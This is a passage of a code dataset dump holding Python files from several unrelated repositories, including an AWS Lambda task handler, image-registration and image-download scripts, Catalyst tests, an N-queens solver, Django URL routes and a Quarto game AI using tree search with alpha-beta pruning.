TaskModel\n\n\ntask_table = TaskModel(os.environ[\"TableDataFlowTaskName\"], None)\n\n\nclass GetCompressDownloadClass(LambdaBaseClass):\n def __init__(self) -> None:\n super().__init__()\n\n @LambdaBaseClass.parse_body\n def parser(self, body):\n self.logger.debug(f\"body in main_parser: {body}\")\n self.id_token = body[\"id_token\"]\n self.task_id = body[\"task_id\"]\n\n def handle(self, event, context):\n ### parse body\n self.parser(event)\n\n identity_id = self.get_identity(self.id_token)\n response = task_table.table.get_item(\n Key={\n \"identity_id\": identity_id,\n \"task_id\": self.task_id\n },\n )\n\n task = response.get(\"Item\", None)\n # pop out identity_id if needed\n if task is None:\n raise Exception(MESS_TASK_NOT_EXIST.format(self.task_id))\n\n task.pop(\"identity_id\", None)\n print(\"Task return: \", task)\n return generate_response(\n message=\"OK\",\n status_code=HTTPStatus.OK,\n data=task,\n )\n\n\n@error_response\ndef lambda_handler(event, context):\n return GetCompressDownloadClass().handle(event, context)\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/core-service/functions/handlers/dataflow/get_compress_download_task/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74269946346","text":"import os\nfrom combine_transforms import get_save_combined_tranform\nimport fnmatch\nimport sys\nimport SimpleITK as sitk\n\n\ndef get_tform_files(slice_dir):\n tform_dic = {}\n affine_tf_file = ''\n bspline_def_file = ''\n reg_dir = os.path.join(slice_dir,'reg')\n for root, dir, files in os.walk(reg_dir):\n order = -1\n if fnmatch.fnmatch(root, '*/*Step_Auto*'): # it's inside /RES*\n direc = os.path.split(root)[1]\n order = int(direc[0]) # folder name should always be something like '1stStep:Auto'\n for fn in fnmatch.filter(files, '*0GenericAffine.mat'): #there should be only one\n affine_tf_file = os.path.join(root,fn)\n for fn in fnmatch.filter(files, '*deformationField.nii'): #there should be only one\n bspline_def_file = os.path.join(root,fn)\n if order > -1:\n tform_dic[order] = (affine_tf_file, bspline_def_file)\n\n return tform_dic\n\n\ndef apply_registrations(slice_dir,mov_file,ref_file,reg_file):\n\n print('Processing {}'.format(slice_dir))\n\n tform_dic = get_tform_files(slice_dir)\n key_list = tform_dic.keys()\n key_list.sort()\n nTf = len(key_list)\n\n print('Found {} transform pair(s)'.format(nTf))\n\n # create ordered list of transformation pairs\n tform_arr = []\n for k in key_list:\n tform_pair = tform_dic[k]\n tform_arr.append(tform_pair)\n\n # compute and save combined transform\n combined_tform_file = os.path.join(slice_dir,'reg/combined_transforms.h5')\n composite_tf = get_save_combined_tranform(tform_arr,combined_tform_file)\n\n # apply transforms\n mov_img = sitk.ReadImage(mov_file, sitk.sitkFloat64)\n ref_img = sitk.ReadImage(ref_file, sitk.sitkFloat64)\n reg_img = sitk.Resample(mov_img, ref_img, composite_tf, sitk.sitkLinear, 0.0, mov_img.GetPixelIDValue())\n sitk.WriteImage(reg_img, reg_file)\n print('Saved registered image.')\n print('Ref image: {}'.format(ref_file))\n print('Mov image: {}'.format(mov_file))\n print('Reg image: {}'.format(reg_file))\n\ndef main():\n if len(sys.argv) != 5:\n print('Usage: apply_combined_registrations.py ')\n exit()\n\n slice_dir = sys.argv[1]\n mov_file = sys.argv[2] #histology or heatmap\n ref_file = sys.argv[3] #blockface\n reg_file = sys.argv[4] #output: registered heatmap/histology\n\n # slice_dir = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164'\n # mov_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/AT100_164_res10.nii'\n # ref_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/AV13-002_0164.png.nii'\n # reg_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/reg.nii'\n\n apply_registrations(slice_dir,mov_file,ref_file,reg_file)\n\nif __name__ == '__main__':\n main()","repo_name":"grinberglab/high-res-3D-tau","sub_path":"registration/apply_combined_registrations.py","file_name":"apply_combined_registrations.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35130728316","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.bms.bms_client import BmsClient\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.bms import exceptions\nfrom googlecloudsdk.command_lib.bms import flags\nfrom googlecloudsdk.core import log\n\nDETAILED_HELP = {\n 'DESCRIPTION':\n \"\"\"\n Update a Bare Metal Solution volume.\n\n This call returns immediately, but the update operation may take\n several minutes to complete. To check if the operation is complete,\n use the `describe` command for the volume.\n \"\"\",\n 'EXAMPLES':\n \"\"\"\n To update a volume called ``my-volume'' in region ``us-central1'' with\n a new snapshot schedule policy ``my-policy'' and snapshot auto delete\n behavior ``oldest-first'', run:\n\n $ {command} my-volume --region=us-central1 --snapshot-schedule-policy=my-policy --snapshot-auto-delete=oldest-first\n \"\"\",\n}\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.GA)\nclass Update(base.UpdateCommand):\n \"\"\"Update a Bare Metal Solution volume.\"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Register flags for this command.\"\"\"\n flags.AddVolumeSnapshotAutoDeleteBehaviorArgToParser(parser)\n flags.AddVolumeArgToParser(parser, positional=True)\n\n ssp_group = parser.add_mutually_exclusive_group()\n flags.AddSnapshotSchedulePolicyArgToParser(parser, required=False,\n group=ssp_group)\n ssp_group.add_argument('--remove-snapshot-schedule-policy',\n action='store_true',\n help='Remove any existing snapshot schedule policy.')\n\n def Run(self, args):\n volume = args.CONCEPTS.volume.Parse()\n policy = args.CONCEPTS.snapshot_schedule_policy.Parse()\n client = BmsClient()\n\n if (not policy and not args.snapshot_auto_delete\n and not args.remove_snapshot_schedule_policy):\n raise exceptions.NoConfigurationChangeError(\n 'No configuration change was requested. Did you mean to include the '\n 'flags `--snapshot-schedule-policy`, '\n '`--remove-snapshot-schedule-policy`, or `--snapshot-auto-delete`?')\n\n op_ref = client.UpdateVolume(\n volume_resource=volume,\n snapshot_schedule_policy_resource=policy,\n remove_snapshot_schedule_policy=args.remove_snapshot_schedule_policy,\n snapshot_auto_delete=flags\n .VOLUME_SNAPSHOT_AUTO_DELETE_BEHAVIOR_MAPPER.GetEnumForChoice(\n args.snapshot_auto_delete))\n\n log.status.Print('Update request issued for: [{}]\\nThis may take several '\n 'minutes to complete.'.format(volume.Name()))\n\n return op_ref\n\n\nUpdate.detailed_help = DETAILED_HELP\n","repo_name":"boostcampaitech2/final-project-level3-cv-15","sub_path":"serving/google-cloud-sdk/lib/surface/bms/volumes/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26646546326","text":"from typing import Dict, Iterable, Union\nfrom collections import OrderedDict\nfrom tempfile import TemporaryDirectory\n\nimport pytest\nimport torch\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom catalyst import data, dl\nfrom catalyst.callbacks.metric import BatchMetricCallback, LoaderMetricCallback\nfrom catalyst.contrib import datasets, nn\nfrom catalyst.metrics import AccuracyMetric, CMCMetric\n\nNUM_CLASSES = 4\nNUM_FEATURES = 100\nNUM_SAMPLES = 200\n\n\nclass DummyModel(nn.Module):\n \"\"\"Dummy model\"\"\"\n\n def __init__(self, num_features: int, num_classes: int) -> None:\n super().__init__()\n self.model = nn.Sequential(\n nn.Flatten(), nn.Linear(in_features=num_features, out_features=num_classes),\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward\n\n Args:\n x: inputs\n\n Returns:\n model's output\n \"\"\"\n return self.model(x)\n\n\n@pytest.mark.parametrize(\n \"input_key,target_key,keys\",\n (\n (\n \"inputs_test\",\n \"logits_test\",\n {\"inputs_test\": \"inputs_test\", \"logits_test\": \"logits_test\"},\n ),\n (\n [\"test_1\", \"test_2\", \"test_3\"],\n [\"test_4\"],\n {\"test_1\": \"test_1\", \"test_2\": \"test_2\", \"test_3\": \"test_3\", \"test_4\": \"test_4\"},\n ),\n (\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\"},\n [\"test_5\"],\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\", \"test_5\": \"test_5\"},\n ),\n (\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\"},\n {\"test_5\": \"test_6\", \"test_7\": \"test_8\"},\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\", \"test_5\": \"test_6\", \"test_7\": \"test_8\"},\n ),\n ),\n)\ndef test_format_keys(\n input_key: Union[str, Iterable[str], Dict[str, str]],\n target_key: Union[str, Iterable[str], Dict[str, str]],\n keys: Dict[str, str],\n) -> None:\n \"\"\"Check MetricCallback converts keys correctly\"\"\"\n accuracy = AccuracyMetric()\n callback = BatchMetricCallback(metric=accuracy, input_key=input_key, target_key=target_key)\n assert callback._keys == keys\n\n\ndef test_classification_pipeline():\n \"\"\"\n Test if classification pipeline can run and compute metrics.\n In this test we check that BatchMetricCallback works with\n AccuracyMetric (ICallbackBatchMetric).\n \"\"\"\n x = torch.rand(NUM_SAMPLES, NUM_FEATURES)\n y = (torch.rand(NUM_SAMPLES) * NUM_CLASSES).long()\n dataset = TensorDataset(x, y)\n loader = DataLoader(dataset, batch_size=64, num_workers=1)\n\n model = DummyModel(num_features=NUM_FEATURES, num_classes=NUM_CLASSES)\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters())\n\n runner = dl.SupervisedRunner(input_key=\"features\", output_key=\"logits\", target_key=\"targets\")\n with TemporaryDirectory() as logdir:\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n loaders=OrderedDict({\"train\": loader, \"valid\": loader}),\n logdir=logdir,\n num_epochs=3,\n verbose=False,\n valid_loader=\"valid\",\n valid_metric=\"loss\",\n minimize_valid_metric=True,\n callbacks=OrderedDict(\n {\n \"classification\": dl.BatchMetricCallback(\n metric=AccuracyMetric(num_classes=NUM_CLASSES),\n input_key=\"logits\",\n target_key=\"targets\",\n ),\n }\n ),\n )\n assert \"accuracy\" in runner.batch_metrics\n assert \"accuracy\" in runner.loader_metrics\n\n\nclass CustomRunner(dl.SupervisedRunner):\n \"\"\"Custom runner for metric learning pipeline\"\"\"\n\n def handle_batch(self, batch: Dict[str, torch.Tensor]) -> None:\n \"\"\"\n Handle batch for train and valid loaders\n\n Args:\n batch: batch to process\n \"\"\"\n if self.is_train_loader:\n images, targets = batch[\"features\"].float(), batch[\"targets\"].long()\n features = self.model(images)\n self.batch = {\n \"embeddings\": features,\n \"targets\": targets,\n \"images\": images,\n }\n else:\n images, targets, is_query = (\n batch[\"features\"].float(),\n batch[\"targets\"].long(),\n batch[\"is_query\"].bool(),\n )\n features = self.model(images)\n self.batch = {\n \"embeddings\": features,\n \"targets\": targets,\n \"is_query\": is_query,\n }\n\n\ndef test_metric_learning_pipeline():\n \"\"\"\n Test if classification pipeline can run and compute metrics.\n In this test we check that LoaderMetricCallback works with\n CMCMetric (ICallbackLoaderMetric).\n \"\"\"\n with TemporaryDirectory() as tmp_dir:\n dataset_train = datasets.MnistMLDataset(root=tmp_dir, download=True)\n sampler = data.BalanceBatchSampler(labels=dataset_train.get_labels(), p=5, k=10)\n train_loader = DataLoader(\n dataset=dataset_train, sampler=sampler, batch_size=sampler.batch_size,\n )\n dataset_val = datasets.MnistQGDataset(root=tmp_dir, transform=None, gallery_fraq=0.2)\n val_loader = DataLoader(dataset=dataset_val, batch_size=1024)\n\n model = DummyModel(num_features=28 * 28, num_classes=NUM_CLASSES)\n optimizer = Adam(model.parameters(), lr=0.001)\n\n sampler_inbatch = data.HardTripletsSampler(norm_required=False)\n criterion = nn.TripletMarginLossWithSampler(margin=0.5, sampler_inbatch=sampler_inbatch)\n\n callbacks = OrderedDict(\n {\n \"cmc\": dl.ControlFlowCallback(\n LoaderMetricCallback(\n CMCMetric(\n topk_args=[1],\n embeddings_key=\"embeddings\",\n labels_key=\"targets\",\n is_query_key=\"is_query\",\n ),\n input_key=[\"embeddings\", \"is_query\"],\n target_key=[\"targets\"],\n ),\n loaders=\"valid\",\n ),\n \"control\": dl.PeriodicLoaderCallback(\n valid_loader_key=\"valid\", valid_metric_key=\"cmc\", valid=2\n ),\n }\n )\n\n runner = CustomRunner(input_key=\"features\", output_key=\"embeddings\")\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n callbacks=callbacks,\n loaders=OrderedDict({\"train\": train_loader, \"valid\": val_loader}),\n verbose=False,\n valid_loader=\"valid\",\n num_epochs=4,\n )\n assert \"cmc01\" in runner.loader_metrics\n","repo_name":"prashanta99/catalyst","sub_path":"catalyst/callbacks/tests/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"4954727957","text":"import typing\nfrom typing import Type, Any, Optional, TypeVar, Dict, List\n\nT = TypeVar(\"T\")\n\n\ndef implicit_cast(value: Any, target_type: Type[T]) -> T:\n # allow implicit int -> float cast\n if isinstance(value, int) and target_type == float:\n value = float(value)\n\n if not isinstance(value, target_type):\n raise TypeError(f\"{type(value)} not equal to {target_type}\")\n\n return value\n\n\ndef is_same_type(type1: Type[Any], type2: Type[Any]) -> bool:\n if type1 in (int, float) and type2 in (int, float):\n return True\n\n return type1 == type2\n\n\ndef _get_generic_args_internal(typing_obj: Any, expected_class: Any, args_map: Optional[Dict[Any, Any]] = None) -> \\\n Optional[List[Any]]:\n if args_map is None:\n args_map = {}\n\n obj = typing.get_origin(typing_obj) or typing_obj\n if obj is None:\n return None\n\n class_args = [args_map.get(x, x)\n for x in typing.get_args(typing_obj)] # get args and replace with passed mapping if exists\n\n if obj == expected_class:\n return class_args\n\n __orig_bases__ = getattr(obj, \"__orig_bases__\", None)\n if __orig_bases__ is None:\n return None\n\n generic_classes = [x for x in __orig_bases__ if typing.get_origin(x) == typing.Generic]\n if len(generic_classes) == 0:\n other_base_classes = obj.__orig_bases__\n args_map = None\n else:\n generic_cls = generic_classes[0]\n other_base_classes = [x for x in __orig_bases__ if typing.get_origin(x) != typing.Generic]\n generic_args = typing.get_args(generic_cls)\n assert len(class_args) == len(generic_args)\n\n args_map = {ga: ca for ca, ga in zip(class_args, generic_args)}\n\n for base_cls in other_base_classes:\n v = _get_generic_args_internal(base_cls, expected_class, args_map)\n if v is not None:\n return v\n\n return None\n\n\ndef get_generic_args_for_obj(obj: Any, expected_class: Any) -> List[Any]:\n typing_cls = getattr(obj, \"__orig_class__\", obj)\n res = _get_generic_args_internal(typing_cls, expected_class, {})\n if res is None:\n raise TypeError(\"no generic type\")\n return res\n\n\n__all__ = [\n \"implicit_cast\",\n \"is_same_type\",\n \"get_generic_args_for_obj\",\n]\n","repo_name":"KrystianD/pycontrolflow","sub_path":"pycontrolflow/type_utils.py","file_name":"type_utils.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5590576712","text":"from pathlib import Path\nimport traceback\nimport numpy as np\nimport random\nfrom tqdm import tqdm\n\nfrom google_images_download import google_images_download\n\nfrom util.constants import *\n\ndef download_images(n_imgs=15):\n '''\n Use google images api to download images and save to save_path\n '''\n # constants\n max_retries = 3\n # set up downloader\n ggl_img_resp = google_images_download.googleimagesdownload()\n doodle_dir = Path(FULL_DOODLE_PATH)\n assert(doodle_dir.is_dir())\n # make output directories if they don't exist\n out_path = Path(IMG_PATH)\n if not out_path.is_dir():\n out_path.mkdir(parents=True)\n # iterate over doodles we have and populate directories of images\n for f_doodle in tqdm(doodle_dir.iterdir()):\n doodle_class = f_doodle.stem\n img_class_path = out_path/doodle_class\n # check if images downloaded already -- if so, continue to next class\n downloaded_imgs = lambda: [i for i in img_class_path.rglob('*')]\n if len(downloaded_imgs()):\n continue\n # download images\n try:\n n_retries = 0\n while n_retries < max_retries and len(downloaded_imgs()) <= 0:\n ggl_img_resp.download({\n 'keywords': classname_to_keyword(doodle_class),\n 'limit': n_imgs,\n 'type': 'photo',\n 'output_directory': str(img_class_path),\n 'no_directory': True,\n 'silent_mode': True\n })\n n_retries += 1\n except:\n print('failed to download ' + doodle_class)\n traceback.print_exc()\n\n### OBSOLETE-- doing different split now ######\ndef test_train_split(classes=None, outfile='test_train_split.npy', split=40):\n '''\n randomly selects `split` fraction of classes to be reserved for test => outputs list of test \n classes to `outfile` (placed inside preprocessing/data directory)\n '''\n if Path(outfile).is_file():\n return np.load(outfile, allow_pickle=True).item()\n else:\n if split < 1:\n split *= N_IMG_CLASSES\n split = int(split)\n if classes==None:\n classes = [i.stem for i in Path(IMG_PATH).glob('*') if i != Path(PROCESSED_IMG_PATH)]\n random.shuffle(classes)\n classes_split = {\n 'test': classes[:split],\n 'train': classes[split:]\n }\n np.save(outfile, classes_split)\n return classes_split\n\ndef classname_to_keyword(name):\n '''\n replace underscores with spaces\n (files should have no spaces in name, but we want to search with normal words)\n '''\n return name.replace(\"_\", \" \")\n\nif __name__=='__main__':\n download_images()\n test_train_split()","repo_name":"16hchung/doodle_img_comparison","sub_path":"preprocessing/images_data.py","file_name":"images_data.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055257494","text":"# N 퀸 # B_9663\n# 백트래킹 문제\n\n\"\"\"\ns[i][j]\n대각선: i+j가 같은 애들끼리 짝지으면 대각선 도출 가능\n반대 대각선: i-j가 같은 애들끼리\n\"\"\"\ndef check(row, col): # 퀸을 놓을 수 있는지 체크 / 못놓으면 버림->백트래킹\n if check_col[col]:\n return False\n if check_dig[row+col]:\n return False\n if check_dig2[row-col+n-1]:\n return False\n return True\n\ndef calc(row):\n if row == n:\n return 1\n ans = 0\n for col in range(n):\n if check(row,col):\n check_dig[row+col] = True # 대각선\n check_dig2[row-col+n-1] = True #반대 대각선\n check_col[col] = True # 열 체크\n a[row][col] = True # 행 체크\n ans += calc(row+1)\n check_dig[row+col] = False\n check_dig2[row-col+n-1] = False\n check_col[col] = False\n a[row][col] = False\n return ans\n\nn = int(input())\na = [[False]*n for _ in range(n)]\ncheck_col = [False] * n\ncheck_dig = [False] * (2*n-1)\ncheck_dig2 = [False] * (2*n-1)\nprint(calc(0))\n\n","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/연습/[Brute_Force]N-queen.py","file_name":"[Brute_Force]N-queen.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19660960648","text":"from django.urls import path\r\nfrom .import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('addcontact/', views.add_contact, name='addcontact'),\r\n path('profile/', views.contact_profile, name='profile'),\r\n path('editcontact/', views.edit_contact, name='editcontact'),\r\n path('deletecontact/', views.delete_contact, name='deletecontact'),\r\n]\r\n","repo_name":"PranavAchrekar/ContactListApp","sub_path":"contact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7604711680","text":"import time \nfrom quarto import Quarto, Player\nfrom copy import deepcopy\nfrom math import sqrt, log\nimport numpy as np\nimport logging\nfrom operator import and_ \nfrom functools import reduce , cache \nimport matplotlib.pyplot as plt\nimport random\nC = sqrt(2)\nclass Node: \n def __init__(self,move,parent, phase : bool, player : bool):\n self.move = move \n self.parent = parent \n self.N = 0 \n self.Q = 0 \n self.children = dict()\n self.outcome = -1\n self.phase = phase\n self.player = player \n self.FLAG = False \n \n def add_children(self, children :list)-> None: \n for child in children : \n self.children[child.move] = child\n \n def value(self) -> float : \n if self.N == 0 :\n return 1000000\n else : \n return self.Q /self.N + C * sqrt(log(self.parent.N/self.N))\n \n \n \nclass MCTS_MINMAX(Player):\n def __init__(self,quarto):\n self.root_state = quarto\n self.root = Node(None ,None,None ,True )\n\n self.node_count = 0 \n self.num_rollouts = 0 \n self.forbidden_pieces = list()\n \n ## SEARCHING THROUGH THE TREE AND SELECT NODE FOR ROLL-OUT PHASE \n def select_node(self,state : Quarto,phase : bool , player : bool) -> tuple:\n node = self.root\n CurrState = deepcopy(state)\n\n while len(node.children) != 0:\n children = node.children.values()\n\n max_value = max(children, key=lambda n: n.value()).value()\n max_nodes = [n for n in children if n.value() == max_value]\n\n node = random.choice(max_nodes)\n player = node.player\n phase = node.phase\n if type(node.move) is tuple:\n CurrState.place(*node.move)\n else : \n CurrState.select(node.move)\n if node.N == 0:\n return node, CurrState, not phase\n player , phase =self.get_player_and_phase(player , phase )\n if self.expand(node, CurrState,phase,player):\n node = random.choice(list(node.children.values()))\n if type(node.move) is tuple:\n CurrState.place(*node.move)\n else: \n CurrState.select(node.move)\n return node, CurrState, not phase\n else : \n return node , CurrState , phase \n '''SINCE THE PHASE AND PLAYER ARE REPRESENTED BY BOOLEANS\n THIS METHODS IS AN OPERATOR THAT GIVES US THE RIGHT PLAYING AND PHASE ORDER\n THE PHASE IS ALWAYS INVERTED\n HOWEVER SINCE A PLAYER COULD DO PLACING AND SELECTION ONE AFTER AN OTHER\n PLAYER(t) = PLAYER(t-1) XOR PHASE(t-1)'''\n\n @staticmethod\n def get_player_and_phase(player , phase)-> tuple:\n return player ^ phase ,not phase \n '''METHODS THAT FINDS THE ALL AVAILABLE POSITIONS ON THE BOARD'''\n @staticmethod\n def get_available_positions(state: Quarto)->list: \n moves = list()\n for i, row in enumerate(state.get_board_status()): \n for j,element in enumerate(row): \n if element == -1 : \n moves.append((i,j)) \n return moves \n def scores(self): \n max_value = max(self.root.children.values(), key=lambda n: n.N).N\n max_nodes = [n for n in self.root.children.values() if n.N == max_value]\n best_child = random.choice(max_nodes)\n return best_child.move\n \n ## EXPANSION PHASE\n def expand(self, parent: Node, state: Quarto,phase : bool , player : bool) -> bool:\n \n if state.check_winner() !=-1 or state.check_finished() :\n return False\n if (not phase) and (parent.move is not None) : \n\n if self.heuristic_2(state,parent.move) : \n parent.FLAG = True \n return False \n \n if phase :\n children = [Node(move, parent,phase, player) for move in self.get_available_pieces(state)]\n else : \n board = state.get_board_status()\n children = [Node((i,j), parent,phase, player) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ]\n\n parent.add_children(children)\n\n return True\n \n ## BACK PROPAGATION PHASE \n def back_propagate(self, node: Node, outcome: int) -> None:\n \n if outcome == 1 :\n winner = node.player\n elif outcome == -1 : \n winner = not node.player \n else: \n winner = None\n while node is not None:\n node.N += 1\n if node.player == winner : \n node.Q += 1\n node = node.parent\n \n \n '''SEARCH METHOD ( NODE SELECTION +EXPANSION + ROLLOUT + BACKPORPAGATION )'''\n def search(self,state: Quarto, phase : bool,player : True ): \n start_time = time.process_time()\n num_rollouts = 0\n while time.process_time() - start_time < self.time_limit:\n node, new_state , new_phase = self.select_node(state,phase,player) \n outcome = self.alpha_beta(new_state , -np.inf , np.inf ,True , new_phase,0,node.move) \n self.back_propagate(node, outcome)\n num_rollouts += 1\n run_time = time.process_time() - start_time\n self.run_time = run_time\n self.num_rollouts = num_rollouts\n \n def scores(self,state : Quarto):\n if state.check_finished():\n return -1\n \n max_value = max(self.root.children.values(), key=lambda n: n.N).N\n max_nodes = [n for n in self.root.children.values() if n.N == max_value]\n best_child = random.choice(max_nodes)\n return best_child.move \n \n '''GET AVAILABLE PIECES TO SELECT'''\n def get_available_pieces(self,state:Quarto)->set:\n pieces = set(range(16))\n pieces_on_board = set()\n board = state.get_board_status()\n for i,j in zip(np.where(board != -1 )[0],np.where(board != -1 )[1]): \n \n pieces_on_board.add(board[i,j])\n if len(self.forbidden_pieces) == 0 :\n return pieces - pieces_on_board\n else : \n for piece in self.forbidden_pieces : \n pieces.remove(piece)\n self.forbidden_pieces= list()\n return pieces - pieces_on_board\n \n def choose_piece(self)-> int:\n self.time_limit = 15\n phase = True \n state = deepcopy(self.root_state)\n board = state.get_board_status() \n if len(board[board != -1]) >= 3 : \n self.__prior_knowledge(state) \n self.search(state,phase,True)\n move =self.scores(state)\n self.root = Node(None ,None,None ,True)\n print(f\" time : {self.run_time}, roll outs : {self.num_rollouts}\")\n\n return move\n \n \n '''KNOWLEDGE BASED APPROACH'''\n ''' FIND THE PIECES THAT COULD LEAD TO A FINISHING MOVE THUS LOSING THE GAME , HOWEVER THIS APPLIES TO THE NODES CONNECTED TO THE ROOT NODE'''\n ''' IF ALL AVAILABLE PIECES COULD LEAD TO A ¨POTENTIAL LOSS , JUST CANCEL THIS PROCESS AND WISH THAT THE OPPONENT MAKES A MISTAKE '''\n def __prior_knowledge(self,state:Quarto)-> None: \n available_pieces = self.get_available_pieces(state)\n\n for piece in available_pieces : \n if self.heuristic_2(state,piece) : \n\n self.forbidden_pieces.append(piece)\n if len(self.forbidden_pieces) == len(available_pieces): \n self.forbidden_pieces = list()\n '''AVOID DOING MCTS IF WE HAVE THE OPPORTUNITY TO PERFORM A GAME FINISHED MOVE'''\n def __finishing_move(self, state :Quarto)->tuple[bool,tuple]: \n board = state.get_board_status()\n available_positions = [(i,j) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ]\n for pos in available_positions:\n temp_state = deepcopy(state)\n temp_state.place(*pos)\n if self.heuristic_1(temp_state,pos): \n\n return (True,pos)\n return (False , None)\n \n def place_piece(self)->tuple[int,int] : \n \n self.time_limit = 15\n phase = False\n state = deepcopy(self.root_state)\n board = state.get_board_status()\n if len(board[board != -1]) > 3 : \n outcome,move=self.__finishing_move(state)\n if outcome: \n return move \n self.search(state,phase,True)\n move =self.scores(state)\n\n self.root = Node(None ,None,None ,True)\n print(f\" time : {self.run_time}, roll outs : {self.num_rollouts}\")\n \n return move\n '''METHOD FINDS WHETHER THE GAME IS FINISHED AFTER A PLAYER HAS PLACED A PIECE ON THE BOARD'''\n @staticmethod\n def heuristic_1(state :Quarto,move : tuple)-> bool : \n board = state.get_board_status()\n row = board[move[0]]\n pieces = row != -1 \n \n if sum(pieces) ==4 : \n if reduce(and_, row) != 0 or reduce(and_, row ^ 15) != 0:\n return True \n column = board[:,move[1]]\n pieces = column != -1\n \n if sum(pieces) == 4 : \n if reduce(and_ , column) != 0 or reduce(and_ , column ^ 15) != 0 : \n return True \n \n if (move[0] == move[1]) or (3-move[0] == move[1]):\n for diag in [board.diagonal() , board[::-1].diagonal()]: \n pieces = diag != -1\n if sum(pieces) == 4 : \n if reduce(and_, diag)!= 0 or reduce(and_ , diag ^15 ) != 0 : \n return True \n return False \n '''THIS METHOD TAKES TAKES THE BOARD STATUS AND A PIECE, TO FIND WHETHER THE PIECE SELECTED COULD LEAD TO FINISHING MOVE'''\n @staticmethod \n def heuristic_2(state: Quarto, move : int )-> bool : \n board = state.get_board_status()\n for row in board: \n pieces = row != -1\n if sum(pieces)==3: \n row_temp = deepcopy(row)\n row_temp[np.where(pieces == False)] = move \n if reduce(and_, row_temp) != 0 or reduce(and_, row_temp ^ 15) != 0:\n return True\n for col in board.T : \n\n pieces = col != -1 \n if sum(pieces) == 3: \n col_temp = deepcopy(col)\n col_temp[np.where(pieces == False)] = move\n if reduce(and_, col_temp) != 0 or reduce(and_, col_temp ^ 15) != 0: \n return True\n for diag in [board.diagonal(), board[::-1].diagonal()]: \n diag = np.array(diag)\n pieces = diag != -1 \n if sum(pieces)==3 : \n diag_temp = deepcopy(diag)\n diag_temp[np.where(pieces == False)] = move\n if reduce(and_,diag_temp) !=0 or reduce(and_,diag_temp^15) != 0 : \n return True\n return False \n \n '''MIN-MAX WITH ALPHA BETA PRUNING'''\n '''Due to the low depth of our search for computational reasons , min-max can only find forced wins and avoid forced losses, if\n possible, within its search horizon. '''\n def alpha_beta(self,state : Quarto ,alpha : float , beta : float , MaximizingPlayer : bool , phase : bool,depth : int, move) :\n \n if depth >= 3 and not phase :\n return int(self.heuristic_2(state,move)) if MaximizingPlayer else -int(self.heuristic_2(state))\n elif depth >=3 and phase : \n return int(self.heuristic_1(state,move)) if MaximizingPlayer else -int(self.heuristic_1(state,move))\n \n if state.check_finished() : \n return 0 \n if phase : \n if self.heuristic_1(state,move) : \n return 1 if MaximizingPlayer else -1\n moves = self.get_available_pieces(state)\n else : \n board = state.get_board_status()\n moves =[ (i,j) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ] \n \n scores = list() \n if MaximizingPlayer : \n player = MaximizingPlayer ^ phase \n for i in moves : \n temp_state = deepcopy(state) \n if phase :\n temp_state.select(i) \n else :\n temp_state.place(*i)\n evaluation = self.alpha_beta(temp_state,alpha , beta ,player,not phase, depth+1 ,i ) \n scores.append(evaluation)\n alpha = max(alpha , evaluation)\n if beta <= alpha : \n break \n return max(scores)\n else : \n player = MaximizingPlayer ^ phase \n for i in moves : \n temp_state = deepcopy(state)\n if phase :\n temp_state.select(i) \n else :\n temp_state.place(*i)\n evaluation = self.alpha_beta(temp_state,alpha , beta , player , not phase, depth+1,i)\n scores.append(evaluation)\n beta = min(beta , evaluation)\n if beta <=alpha : \n break \n return min(scores)\n \n \n ","repo_name":"aminmbare/MCTS-QUARTO","sub_path":"quarto/quarto/MCTS_MINMAX.py","file_name":"MCTS_MINMAX.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37965415351","text":"from django.db.models.fields import 